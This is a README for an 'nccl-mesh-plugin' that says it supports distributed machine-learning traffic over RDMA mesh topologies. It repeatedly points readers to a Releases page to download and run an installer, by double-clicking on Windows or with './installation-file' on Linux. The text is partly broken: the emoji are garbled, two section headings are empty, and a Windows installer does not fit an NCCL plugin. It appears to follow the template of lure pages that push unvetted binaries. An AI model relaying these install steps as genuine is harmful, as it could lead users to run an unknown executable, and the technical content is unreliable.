mrpottermusic

πŸš€ nccl-mesh-plugin - Effortless Distributed Machine Learning

Download Latest Release

πŸ“– Overview

The NCCL Mesh Plugin enhances your machine learning experience by allowing efficient communication across direct-connect RDMA mesh topologies. Unlike standard NCCL plugins, this tool works seamlessly for nodes located in different subnets. It caters to various topologies, ensuring that you can set up your distributed machine learning environment without the hassle of complex networking solutions.

🌐 Supported Topologies

πŸ”§ Tested Configuration

This plugin has been tested with three DGX Spark workstations utilizing 100Gbps direct RDMA links. We used it for distributed LLM training with the Qwen2.5-14B model using DeepSpeed ZeRO.


πŸš€ Getting Started

Follow these steps to download and run the NCCL Mesh Plugin:

  1. Visit the Download Page
    Click the link below to go to the Releases page of this repository.
    Download NCCL Mesh Plugin

  2. Select the Latest Release
    Look for the section labeled β€œLatest Release.” It usually appears at the top of the page. Ensure it is the most recent version.

  3. Download the Plugin
    Find the plugin file that matches your operating system (Windows, Linux, etc.) and click the download link related to that file. Save it to your computer.

  4. Install the Plugin
    After the file has downloaded, locate it on your computer. Depending on your operating system, installation procedures may vary:
    • For Windows: Double click the file and follow the prompts.
    • For Linux: Use your terminal to navigate to the file location and run the installer with the command ./installation-file.
  5. Set Up Your Environment
    Ensure that your machine has the following requirements to run the plugin efficiently:
    • OS: Windows 10 or later, or a compatible Linux distribution.
    • NVIDIA Drivers: Install the latest versions for optimal performance.
    • NCCL Support: Ensure you have NCCL set up prior to using this plugin.

πŸ“₯ Download & Install

You can download the NCCL Mesh Plugin directly from our Releases page. Here is the link for quick access:
Download NCCL Mesh Plugin

Once you download the file, follow the installation steps outlined above to set everything up.


πŸ› οΈ System Requirements

The NCCL Mesh Plugin requires certain hardware and software specifications for optimal use:


βš™οΈ Configuration

After installation, you may need to configure the plugin. Follow these steps:

  1. Open the Configuration File
    Navigate to the plugin directory and open the configuration file named config.toml.

  2. Edit Topology Settings
    Modify the settings to match your specific network topology. You can set either β€œfull mesh”, β€œring”, or β€œline”.

  3. Save Changes
    Make sure to save your changes before exiting the file.

  4. Run the Plugin
    Start your distributed ML training environment as you normally would, ensuring the NCCL Mesh Plugin is included in your command.


πŸ“ž Support

If you encounter any issues or have questions regarding installation or configuration, feel free to reach out. You can open an issue on the GitHub repository, and our team will be happy to assist you.


For further details and updates, always refer back to our Releases page.